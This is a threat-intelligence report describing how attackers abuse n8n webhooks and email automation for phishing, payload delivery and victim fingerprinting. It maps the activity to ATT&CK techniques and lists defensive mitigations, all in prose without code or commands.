Threat Actors Weaponize n8n Workflow Platform for Phishing and Payload Delivery

Executive Summary

Threat actors have been actively weaponizing the legitimate n8n workflow automation platform to conduct phishing campaigns and deliver malware since at least October 2025. By abusing n8n's webhook and email automation features, attackers send malicious emails from the platform's own trusted infrastructure, effectively bypassing traditional email security filters that rely on sender reputation. This technique represents a significant evolution in phishing operations, turning a widely-used productivity and AI integration tool into a potent attack vector.

Technical Analysis

The attack chain begins with threat actors compromising n8n instances, either by deploying their own or potentially exploiting misconfigured or vulnerable public instances. According to The Hacker News, the attackers configure n8n workflows that are triggered by incoming webhooks. These workflows are designed to send automated emails containing phishing lures or links to malicious payloads. The emails originate from n8n's infrastructure, which typically has a high sender reputation score, allowing them to evade spam filters and domain-based message authentication, reporting, and conformance (DMARC) checks.

Once a recipient interacts with the email—by clicking a link or opening an attachment—the workflow can execute subsequent actions. These include delivering malware directly or redirecting the victim to credential-harvesting pages. The n8n platform can also be used to fingerprint visiting devices by collecting HTTP request headers and other telemetry sent via the webhook, providing reconnaissance data to the attackers. The specific malware families delivered via this method have not been detailed in the available source.

Tactics, Techniques & Procedures

The primary technique observed is the abuse of legitimate cloud services and software-as-a-service (SaaS) platforms for offensive operations (T1584.006). This falls under the broader tactic of Resource Development. Specifically, attackers are:

• Using trusted infrastructure (n8n's email servers) to send phishing emails, bypassing reputation-based filtering.
• Automating spear-phishing payload delivery via configured workflows (T1566).
• Possibly exploiting public-facing applications (T1190) if they are compromising unsecured n8n instances, though the initial access vector for the attackers' own n8n setup is not confirmed.
• Gathering victim host information through webhook-triggered fingerprinting workflows (T1592).

Threat Actor Context

The source material does not attribute this activity to a known threat actor group. The operational pattern suggests financially motivated actors or initial access brokers seeking to establish footholds in target networks. The use of a legitimate automation tool indicates a moderate level of sophistication, focusing on operational security (OpSec) and efficacy rather than novel malware development.

Mitigations & Recommendations

Organizations should implement a defense-in-depth strategy to counter this threat:

1. Email Security: Augment traditional reputation-based filtering with content analysis, URL inspection, and attachment sandboxing. Train users to be suspicious of unexpected emails, even from known SaaS platforms.
2. Network Monitoring: Monitor outbound connections to n8n cloud infrastructure (n8n.cloud) from corporate endpoints, as this could indicate a compromised internal n8n instance or a user interacting with a malicious workflow.
3. n8n Instance Hardening: For organizations using n8n, ensure instances are not publicly exposed without authentication. Implement strict access controls, audit workflow logs for suspicious activity, and disable unnecessary email-sending capabilities if not required.
4. Endpoint Protection: Deploy robust endpoint detection and response (EDR) solutions capable of detecting post-exploitation activity and payload execution, regardless of the initial delivery vector.